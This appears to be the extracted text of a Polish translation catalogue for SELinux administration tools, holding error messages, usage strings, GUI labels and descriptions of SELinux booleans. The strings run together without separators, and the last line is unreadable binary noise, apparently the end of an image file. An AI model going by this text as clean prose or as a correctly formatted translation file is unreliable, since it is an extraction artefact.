Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Nie można dodać użytkownika SELinuksa %sNie można dodać adresu %sNie można dodać kontekstu pliku dla %sNie można dodać interfejsu %sNie można dodać mapowania loginu do %sNie można dodać portu %s/%sNie można dodać przedrostka %s do %sNie można dodać roli %s do %sNie można sprawdzić, czy użytkownik SELinuksa %s został określonyNie można sprawdzić, czy adres %s został określonyNie można sprawdzić, czy wartość logiczna %s została określonaNie można sprawdzić, czy kontekst pliku dla %s został określonyNie można sprawdzić, czy interfejs %s został określonyNie można sprawdzić, czy mapowanie loginu dla %s zostało określoneNie można sprawdzić, czy port %s/%s został określonyNie można zamknąć deskryptorów.
Nie można wykonać transakcji semanageNie można utworzyć użytkownika SELinuksa dla %sNie można utworzyć klucza dla %sNie można utworzyć klucza %s/%sNie można utworzyć adresu dla %sNie można utworzyć kontekstu dla %sNie można utworzyć kontekstu dla %s/%sNie można utworzyć kontekstu pliki dla %sNie można utworzyć interfejsu dla %sNie można utworzyć klucza dla %sNie można utworzyć mapowania loginu dla %sNie można utworzyć portu dla %s/%sNie można utworzyć obsługi semanageNie można usunąć użytkownika SELinuksa %sNie można usunąć adresu %sNie można usunąć wartości logicznej %sNie można usunąć kontekstu pliku dla %sNie można usunąć interfejsu %sNie można usunąć mapowania loginu dla %sNie można usunąć portu %s/%sNie można usunąć kontekstu pliku %sNie można usunąć portu %sNie można ustalić trybu wymuszania.
Nie można nawiązać połączenia semanageNie można rozpakować klucza dla %sNie można wyświetlić listy modułów SELinuksaNie można wyświetlić listy użytkowników SELinuksaNie można wyświetlić listy adresówNie można wyświetlić listy wartości logicznychNie można wyświetlić listy kontekstów plikówNie można wyświetlić listy interfejsówNie można wyświetlić listy lokalnych kontekstów plikówNie można wyświetlić listy mapowań loginówNie można wyświetlić listy portówNie można wyświetlić listy ról dla użytkownika %sNie można wyświetlić listy kontekstów plikówNie można wyświetlić listy portówNie można zmodyfikować użytkownika SELinuksa %sNie można zmodyfikować adresu %sNie można zmodyfikować wartości logicznej %sNie można zmodyfikować kontekstu pliku dla %sNie można zmodyfikować interfejsu %sNie można zmodyfikować mapowania loginu dla %sNie można zmodyfikować portu %s/%sNie można otworzyć pliku %s
Nie można odpytać adresu %sNie można odpytać kontekstu pliku %sNie można odpytać kontekstu pliku dla %sNie można odpytać interfejsu %sNie można odpytać portu %s/%sNie można odpytać seuser dla %sNie można odpytać użytkownika dla %sNie można usunąć domeny zezwalania %s (usunięcie nie powiodło się)Nie można ustawić poziomu MLS dla %sNie można ustawić zasięgu MLS dla %sNie można ustawić użytkownika SELinuksa dla %sNie można ustawić aktywnej wartości zmiennej logicznej %sNie można ustawić kontekstu adresu dla %sNie można ustawić kontekstu wykonywania dla %s.
Nie można ustawić kontekstu pliku dla %sNie można ustawić kontekstu interfejsu dla %sNie można ustawić maski dla %sNie można ustawić kontekstu komunikatu dla %sNie można ustawić pól MLS w kontekście adresu dla %sNie można ustawić pól MLS w kontekście pliku dla %sNie można ustawić pól MLS w kontekście interfejsu dla %sNie można ustawić pól MLS w kontekście portu dla %s/%sNie można ustawić nazwy dla %sNie można ustawić domeny zezwalania %s (instalacja modułu nie powiodła się)Nie można ustawić kontekstu portu dla %s/%sNie można ustawić roli w kontekście adresu dla %sNie można ustawić roli w kontekście pliku dla %sNie można ustawić roli w kontekście interfejsu dla %sNie można ustawić roli w kontekście portu dla %s/%sNie można ustawić typu w kontekście adresu dla %sNie można ustawić typu w kontekście pliku dla %sNie można ustawić typu w kontekście interfejsu dla %sNie można ustawić typu w kontekście portu dla %s/%sNie można ustawić użytkownika w kontekście adresu dla %sNie można ustawić użytkownika w kontekście pliku dla %sNie można ustawić użytkownika w kontekście interfejsu dla %sNie można ustawić użytkownika w kontekście portu dla %s/%sNie można uruchomić transakcji semanageNie można sprawdzić stanu włączenia MLSNie można uzyskać domyślnego typu.
Tworzy/manipuluje plikami tymczasowymi w /tmpCronObecny tryb wymuszaniaDostosowaneDemon systemowy D-BusBazy danychUsuń %sUsunięcie kontekstu plikuUsunięcie portu sieciowegoUsunięcie mapowania użytkownika SELinuksaUsunięcie użytkownikaOpisWyłączenie audytuWyłączenie ochrony SELinuksa dla serwera klastraWyłączenie ochrony SELinuksa dla EvolutionWyłączenie ochrony SELinuksa dla demona HALWyłączenie ochrony SELinuksa dla demona hasła NISWyłączenie ochrony SELinuksa dla demona przesyłania NISWyłączenie ochrony SELinuksa dla Menedżera sieciWyłączenie ochrony SELinuksa dla ThunderbirdaWyłączenie ochrony SELinuksa dla demona acctWyłączenie ochrony SELinuksa dla amandyWyłączenie ochrony SELinuksa dla amavisWyłączenie ochrony SELinuksa dla demona apmdWyłączenie ochrony SELinuksa dla demona arpwatchWyłączenie ochrony SELinuksa dla demona auditdWyłączenie ochrony SELinuksa dla demona automountWyłączenie ochrony SELinuksa dla AvahiWyłączenie ochrony SELinuksa dla demona BluetoothWyłączenie ochrony SELinuksa dla demona cannaWyłączenie ochrony SELinuksa dla demona cardmgrWyłączenie ochrony SELinuksa dla demona cipedWyłączenie ochrony SELinuksa dla demona clamdWyłączenie ochrony SELinuksa dla clamscanWyłączenie ochrony SELinuksa dla clvmdWyłączenie ochrony SELinuksa dla demona comsatWyłączenie ochrony SELinuksa dla demona courierWyłączenie ochrony SELinuksa dla demona cpucontrolWyłączenie ochrony SELinuksa dla demona cpuspeedWyłączenie ochrony SELinuksa dla demona crondWyłączenie ochrony SELinuksa dla demona hplip CUPSWyłączenie ochrony SELinuksa dla serwera zaplecza cupsdWyłączenie ochrony SELinuksa dla demona cupsdWyłączenie ochrony SELinuksa dla cupsd_lpdWyłączenie ochrony SELinuksa dla demona CVSWyłączenie ochrony SELinuksa dla demona cyrusWyłączenie ochrony SELinuksa dla demona dbskkdWyłączenie ochrony SELinuksa dla demona dbusdWyłączenie ochrony SELinuksa dla dccdWyłączenie ochrony SELinuksa dla dccifdWyłączenie ochrony SELinuksa dla dccmWyłączenie ochrony SELinuksa dla demona ddtWyłączenie ochrony SELinuksa dla demona devfsdWyłączenie ochrony SELinuksa dla demona dhcpcWyłączenie ochrony SELinuksa dla demona dhcpdWyłączenie ochrony SELinuksa dla demona dictdWyłączenie ochrony SELinuksa dla demona distccdWyłączenie ochrony SELinuksa dla demona dmesgWyłączenie ochrony SELinuksa dla demona dnsmasqWyłączenie ochrony SELinuksa dla demona dovecotWyłączenie ochrony SELinuksa dla demona entropydWyłączenie ochrony SELinuksa dla fetchmailWyłączenie ochrony SELinuksa dla demona fingerdWyłączenie ochrony SELinuksa dla demona freshclamWyłączenie ochrony SELinuksa dla demona fsdaemonWyłączenie ochrony SELinuksa dla gierWyłączenie ochrony SELinuksa dla demona gpmWyłączenie ochrony SELinuksa dla demona gssWyłączenie ochrony SELinuksa dla demona hostnameWyłączenie ochrony SELinuksa dla demona hotplugWyłączenie ochrony SELinuksa dla demona howlWyłączenie ochrony SELinuksa dla suexec HTTPWyłączenie ochrony SELinuksa dla rotatelogs httpdWyłączenie ochrony SELinuksa dla demona hwclockWyłączenie ochrony SELinuksa dla demona i18nWyłączenie ochrony SELinuksa dla demona imazesrvWyłączenie ochrony SELinuksa dla demonów potomnych inetdWyłączenie ochrony SELinuksa dla demona inetdWyłączenie ochrony SELinuksa dla demona inndWyłączenie ochrony SELinuksa dla demona iptablesWyłączenie ochrony SELinuksa dla demona ircdWyłączenie ochrony SELinuksa dla demona irqbalanceWyłączenie ochrony SELinuksa dla demona iSCSIWyłączenie ochrony SELinuksa dla demona jabberdWyłączenie ochrony SELinuksa dla demona kadmindWyłączenie ochrony SELinuksa dla demona klogdWyłączenie ochrony SELinuksa dla demona krb5kdcWyłączenie ochrony SELinuksa dla demonów ktalkWyłączenie ochrony SELinuksa dla demona kudzuWyłączenie ochrony SELinuksa dla demona locateWyłączenie ochrony SELinuksa dla demona LPDWyłączenie ochrony SELinuksa dla demona lrrdWyłączenie ochrony SELinuksa dla demona LVMWyłączenie ochrony SELinuksa dla demona MailmanWyłączenie ochrony SELinuksa dla demona mdadmWyłączenie ochrony SELinuksa dla demona monopdWyłączenie ochrony SELinuksa dla demona mrtgWyłączenie ochrony SELinuksa dla demona mysqldWyłączenie ochrony SELinuksa dla demona nagiosWyłączenie ochrony SELinuksa dla demona namedWyłączenie ochrony SELinuksa dla demona nessusdWyłączenie ochrony SELinuksa dla demona nfsdWyłączenie ochrony SELinuksa dla demona nmbdWyłączenie ochrony SELinuksa dla demona nrpeWyłączenie ochrony SELinuksa dla demona nscdWyłączenie ochrony SELinuksa dla demona nsdWyłączenie ochrony SELinuksa dla demona ntpdWyłączenie ochrony SELinuksa dla oddjobWyłączenie ochrony SELinuksa dla oddjob_mkhomedirWyłączenie ochrony SELinuksa dla demona OpenVPNWyłączenie ochrony SELinuksa dla demona PAMWyłączenie ochrony SELinuksa dla PegasusaWyłączenie ochrony SELinuksa dla demona perditionWyłączenie ochrony SELinuksa dla demona portmapWyłączenie ochrony SELinuksa dla demona portslaveWyłączenie ochrony SELinuksa dla PostfiksaWyłączenie ochrony SELinuksa dla demona PostgreSQLWyłączenie ochrony SELinuksa dla demona pptpWyłączenie ochrony SELinuksa dla demona prelinkWyłączenie ochrony SELinuksa dla demona privoxyWyłączenie ochrony SELinuksa dla demona ptalWyłączenie ochrony SELinuksa dla demona PXEWyłączenie ochrony SELinuksa dla pyzordWyłączenie ochrony SELinuksa dla demona QuotyWyłączenie ochrony SELinuksa dla demona radiusdWyłączenie ochrony SELinuksa dla demona radvdWyłączenie ochrony SELinuksa dla rdiscWyłączenie ochrony SELinuksa dla readaheadWyłączenie ochrony SELinuksa dla demona restorecondWyłączenie ochrony SELinuksa dla demona RHGBWyłączenie ochrony SELinuksa dla ricciWyłączenie ochrony SELinuksa dla ricci_modclusterdWyłączenie ochrony SELinuksa dla demona rlogindWyłączenie ochrony SELinuksa dla demona rpcdWyłączenie ochrony SELinuksa dla rshdWyłączenie ochrony SELinuksa dla demona rsyncWyłączenie ochrony SELinuksa dla demona saslauthdWyłączenie ochrony SELinuksa dla demona scannerdaemonWyłączenie ochrony SELinuksa dla demona SendmailWyłączenie ochrony SELinuksa dla setransWyłączenie ochrony SELinuksa dla demona setroubleshootWyłączenie ochrony SELinuksa dla demona slapdWyłączenie ochrony SELinuksa dla demona slrnpullWyłączenie ochrony SELinuksa dla demona smbdWyłączenie ochrony SELinuksa dla demona snmpdWyłączenie ochrony SELinuksa dla demona SnortWyłączenie ochrony SELinuksa dla demona soundWyłączenie ochrony SELinuksa dla demona sounddWyłączenie ochrony SELinuksa dla demona spamdWyłączenie ochrony SELinuksa dla demona speedmgmtWyłączenie ochrony SELinuksa dla demona SquidWyłączenie ochrony SELinuksa dla demona SSHWyłączenie ochrony SELinuksa dla demona stunnelWyłączenie ochrony SELinuksa dla demona swatWyłączenie ochrony SELinuksa dla demona sxidWyłączenie ochrony SELinuksa dla demona syslogdWyłączenie ochrony SELinuksa dla systemowych zadań CronaWyłączenie ochrony SELinuksa dla demona TCPWyłączenie ochrony SELinuksa dla demona TelnetWyłączenie ochrony SELinuksa dla demona tftpdWyłączenie ochrony SELinuksa dla przeglądarek WWWWyłączenie ochrony SELinuksa dla demona transproxyWyłączenie ochronySELinuksa dla demona udevWyłączenie ochrony SELinuksa dla demona umlWyłączenie ochrony SELinuksa dla demona updfstabWyłączenie ochrony SELinuksa dla demona uptimedWyłączenie ochrony SELinuksa dla demona uucpdWyłączenie ochrony SELinuksa dla demona VMWareWyłączenie ochrony SELinuksa dla demona watchdogWyłączenie ochrony SELinuksa dla demona winbindWyłączenie ochrony SELinuksa dla demona XDMWyłączenie ochrony SELinuksa dla kontroli XenaWyłączenie ochrony SELinuksa dla demona XenWyłączenie ochrony SELinuksa dla demona xfsWyłączenie ochrony SELinuksa dla demona ypbindWyłączenie ochrony SELinuksa dla demona ypservWyłączonyWyłączone
Zezwalanie
Wymuszanie
Bez zezwolenia żadnemu procesowi na wczytywanie modułów jądraBez zezwolenia żadnemu procesowi na modyfikowanie polityki jądra SELinuksaBez zezwolenia na przemienienie na sysadm_t, dotyczy sudo i suBez audytu rzeczy, o których wiadomo, że są zepsute, ale nie niosą za sobą ryzykaEdycja portu sieciowegoWłączenie audytWłączenie/wyłączenie dodatkowych reguł audytu, które normalnie nie są zgłaszane w plikach dziennika.WymuszanieProszę podać pełną ścieżkę do ograniczanego pliku wykonywalnego.Proszę podać pełną ścieżkę do skryptu init używanego do uruchamiania ograniczanej aplikacji.Proszę podać unikalną nazwę dla roli ograniczanego aplikacji lub użytkownika.Błąd podczas przydzielania pamięci.
Błąd podczas przydzielania argv0 powłoki.
Błąd podczas zmieniania UID, przerywanie.
Błąd podczas łączenia z systemem audytu.
Błąd podczas opuszczania możliwości SETUID, przerywanie
Błąd podczas opuszczania możliwości, przerywanie
Błąd podczas zwalniania caps
Błąd podczas inicjowania możliwości, przerywanie.
Błąd podczas przywracania KEEPCAPS, przerywanie
Błąd podczas wysyłania komunikatu audytu.
Błąd podczas ustawiania KEEPCAPS, przerywanie
Błąd podczas ustawiania możliwości, przerywanie
Błąd. Nie można otworzyć %s.
Błąd. Powłoka jest nieprawidłowa.
Błąd: podano wiele poziomów
Błąd: podano wiele ról
Błąd: podano wiele typów
Błąd: brak zezwolenia na zmianę poziomów na niezabezpieczonym terminalu 
Plik wykonywalnyIstniejące role użytkownikówIstniejący_użytkownikPoprawne zamknięcie TTY nie powiodło się
Określenie
plikuTyp
plikuPlik kontekstów plikuEtykiety plikówOkreślenie plikuTyp plikuKontekst pliku dla %s został określony w polityce, nie może zostać usuniętyKontekst pliku dla %s nie został określonyFiltrGPLGryUtworzenie nowego modułu politykiWidok grupyUsługa HTTPDSkrypt initWspółpracuje z terminalemInterfejs %s został określony w polityce, nie może zostać usuniętyInterfejs %s nie został określonyPlik interfejsuDemon usług internetowych (inetd)Demony usług internetowych to demony uruchamiane przez xinetdNieprawidłowe określenie plikuKerberosEtykietyGrupa linuksowa %s nie istniejeUżytkownik linuksowy %s nie istniejeWidok listyWczytanie modułu politykiWczytanie modułu politykiBlokowanie...Login
 Login "%s" jest wymaganyLoginMapowanie loginu dla %s zostało określone w polityce, nie może zostać usunięteMapowanie loginu dla %s nie zostało określonePoziom MCSZakres MCSMLSMLS/Zakres MLS/
MCSPoziom
MLS/MCSZakres MLS/MCSOchrona pamięciMinimalna rola użytkownika terminalaMinimalna rola użytkownika X WindowZmodyfikuj %sZmodyfikowanie kontekstu plikuZmodyfikowanie mapowania użytkownika SELinuksaZmodyfikowanie użytkownikaProszę zmodyfikować istniejący wpis logowania użytkownika.Moduł %s.pp został już wczytany w bieżącej polityce.
Kontynuować?Nazwa modułuMountNFSNISNazwaUsługa nazwKonfiguracja sieciPort sieciowyBrak kontekstu w pliku %s
Wymagany jest adres węzłaWymagana jest maska sieciowa węzłaNiezaimplementowaneBłąd opcji %s Brak pamięci.
Hasło:ZezwalaniePolgenKatalog politykiModuł politykiPortPort %s/%s został już określonyPort %s/%s został określony w polityce, nie może zostać usuniętyPort %s/%s nie został określonyNumer portuWymagany jest portNumer portu "%s" jest nieprawidłowy. 0 < NUMER_PORTU < 65536 Porty muszą być liczbą lub zakresem liczb od 1 do %d PrzedrostekDrukowanieDomena procesuProtokółProtokółWymagany jest protokół UDP lub TCPRed Hat 2007Podczas następnego ponownego uruchomienia etykiety zostaną ponownie nadane.Usunięcie wczytywalnego modułu politykiWymagana jest co najmniej jedna kategoriaWymagany jest przedrostek lub roleWymagany jest przedrostek, role, poziom lub zasięgWymagane jest setypeWymagane jest setype lub serangeWymagane jest setype, serange lub seuserWymagane jest seuser lub serangePrzywrócenie ustawień zmiennych logicznych do domyślnych systemuRolaRola użytkownika administratora rootUruchomienie kreatora blokowania zmiennych logicznychSerwer uwierzytelniania SASLUżytkownik
SELinuksaAdministracja SELinuksaInterfejs SELinuksaNarzędzie tworzenia polityki SELinuksaTyp portu
SELinuksaTyp portu SELinuksaRole SELinuksaOchrona usługi SELinuksaTyp SELinuksaWymagany jest typ SELinuksaUżytkownik SELinuksaZmienna logiczna SELinuksafcontext SELinuksaPolityka SELinuksa nie jest zarządzana lub nie można uzyskać dostępu do składu.Użytkownik SELinuksa %s nie został określony w polityce, nie może zostać usuniętyUżytkownik SELinuksa %s nie został określonyUżytkownik SELinuksa "%s" jest wymaganySSHSambaWybór obiektu zarządzaniaWybór portówNależy wybrać rolę użytkownika administratora root, jeśli ten użytkownik będzie używany do administrowania komputerem podczas uruchamiania jako root. Ten użytkownik nie będzie mógł zalogować się bezpośrednio do systemu.Wybór katalogu, w którym utworzyć pliki politykiWybór katalogów, które ograniczana aplikacja posiada lub do nich zapisujeWybór ograniczanego pliku wykonywalnego.Wybór plików, które ograniczana aplikacja tworzy lub zapisujeProszę wybrać, czy ponownie nadać etykiety całemu systemowi plików podczas następnego ponownego uruchomienia. Ponowne nadanie etykiet może zająć dużo czasu, w zależności od rozmiaru systemu. Jeśli zmieniasz typy polityki lub przechodzisz z wyłączonego do wymuszania, ponowne nadanie etykiet jest wymagane.Wybór ograniczanego pliku skryptu init.Proszę wybrać domeny, które ten użytkownik ma administrować.Proszę wybrać role użytkownika, które przemienić do tych domen aplikacji.Typ pliku
SELinuksaTransakcja semanage jest już wykonywanaTransakcja semanage nie jest wykonywanaWysyła komunikaty audytuWysyła wiadomości e-mailUstawienia skryptu-l może zostać użyte z obsługą MLS SELinuksa.
newrole może zostać użyte tylko na jądrze SELinux.
run_init może zostać uruchomione tylko na jądrze SELinuksa.
Ochrona przed niechcianymi wiadomościamiSquidStandardowy demon initStandardowe demony init to demony startowane podczas uruchamiania przez skrypty init. Zwykle wymagają skryptu w /etc/rc.d/init.dStanDomyślny systemowy tryb wymuszaniaDomyślny systemowy typ polityki: Ten użytkownik może logować się do komputera przez X Window lub terminal. Domyślnie ten użytkownik nie będzie posiadał setuid, sieci, sudo ani suTen użytkownik będzie logował się do komputera tylko przez terminal lub zdalne logowanie. Domyślnie ten użytkownik nie będzie posiadał setuid, sieci, su ani sudo.Aby aktywować ten pakiet polityki, należy wykonać:Przełączenie między dostosowanymi i wszystkimi zmiennymi logicznymiPrzełączenie między dostosowanymi i wszystkimi portamiPrzełączenie między wszystkimi i dostosowanymi kontekstami plikówPrzemiana użytkownika SELinuksa staff na domenę przeglądarki WWWPrzemiana użytkownika SELinuksa sysadm na domenę przeglądarki WWWPrzemiana użytkownika SELinuksa user na domenę przeglądarki WWWPrzemiana użytkownika SELinuksa xguest na domenę przeglądarki WWWTyp %s_t został już określony w bieżącej polityce.
Kontynuować?Plik typu wymuszaniaWymagany jest typUŻYCIE: run_init <skrypt> <parametry...>
  gdzie: <skrypt> jest nazwą skryptu init do wykonania,
         a <parametry ...> są parametrami dla tego skryptu.Typy USER automatycznie uzyskują typ tmpNie można przydzielić pamięci dla new_contextNie można wyczyścić środowiska
Nie można uzyskać pustego ustawienia sygnału
Nie można przywrócić środowiska, przerywanie
Nie można przywrócić etykiety TTY...
Nie można ustawić obsługi SIGHUP
Uniwersalny tunel SSLNieznany lub brakujący protokółNiezarezerwowane porty (powyżej 1024)Użycie %s -LUżycie %s -L -l użytkownikUżycie %s -d Plik...Użycie %s -l -d użytkownik...Użycie %s -l KATEGORIA użytkownik...Użycie %s -l [[+|-]KATEGORIA],...]q użytkownik...Użycie %s KATEGORIA Plik...Użycie %s [[+|-]KATEGORIA],...]q Plik...Można użyć --, aby zakończyć listę opcji. Na przykładAplikacja użytkownikaAplikacje użytkownika to wszystkie aplikacje, które należy ograniczyć, a są uruchamiane przez użytkownikówMapowanie użytkownikaPrzywileje użytkownikówRola użytkownikaUżytkownik z pełną siecią, brakiem aplikacji setuid bez przemiany i su, może używać sudo dla ról administratorów rootUżytkownik z pełną siecią, brakiem aplikacji setuid bez przemiany, sudo i su.Używa PAM do uwierzytelnianiaUżywa D-BusUżywa wywołań nsswitch lub getpw*Proszę sprawdzić nazwęWersjaOstrzeżenie. Nie można pobrać informacji o TTY.
Ostrzeżenie. Nie można przywrócić kontekstu dla %s
Aplikacje/skrypty WWW (CGI)Aplikacje WWWSkrypty CGI aplikacji/skryptów WWW (CGI) uruchamiane przez serwer WWW (Apache)Zapisuje komunikaty syslog	XenSerwer XNależy dodać co najmniej jedną rolę dla %sNależy podać plik wykonywalnyNależy podać nazwę dla ograniczanego procesu/użytkownikaNależy podać ścieżkę do pliku wykonywalnego dla ograniczanego procesuNależy wybrać użytkownikaNależy podać jedną z poniższych wartości: %s_Usuń_Właściwościwszystkowszystkie pliki
zwykłe pliki
katalog
urządzenie znakowe
urządzenie blokowe
gniazdo
dowiązanie symboliczne
nazwany potok
uwierzytelnienie nie powiodło się.
nie można odnaleźć prawidłowego wpisu w pliku passwd.
chcat -- -CompanyConfidential /dokumenty/biznesplan.odtchcat -l +CompanyConfidential jużytkownikbłąd podczas odczytywania konfiguracji usługi PAM.
zbudowanie nowego zasięgu z poziomem %s nie powiodło się
przekonwertowanie nowego kontekstu na łańcuch tekstowy nie powiodło się
wykonanie powłoki nie powiodło się
uzyskanie informacji o koncie nie powiodło się
uzyskanie nowego kontekstu nie powiodło się.
uzyskanie old_context nie powiodło się.
zainicjowanie PAM nie powiodło się
ustawienie PAM_TTY nie powiodło się
ustawienie nowego zasięgu %s nie powiodło się
ustawienie nowej roli %s nie powiodło się
ustawienie nowego typu %s nie powiodło się
getpass nie może otworzyć /dev/tty
globalnelabel37label38label39label41label42label44label50label59newrole: %s: błąd w wierszu %lu.
newrole: rozgałęzienie nie powiodło się: %snewrole: niepoprawne hasło dla %s
newrole: przekroczenie tablicy skrótów konfiguracji nazwy usługi
wyłączonewłączonepppdrsyncrun_init: nieprawidłowe hasło dla %s
system-config-selinuxPiotr Drąg <piotrdrag@gmail.com>, 2006typnieznaneużycie: %s [-qi]
use_syslog musi być zmienną logiczną 
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`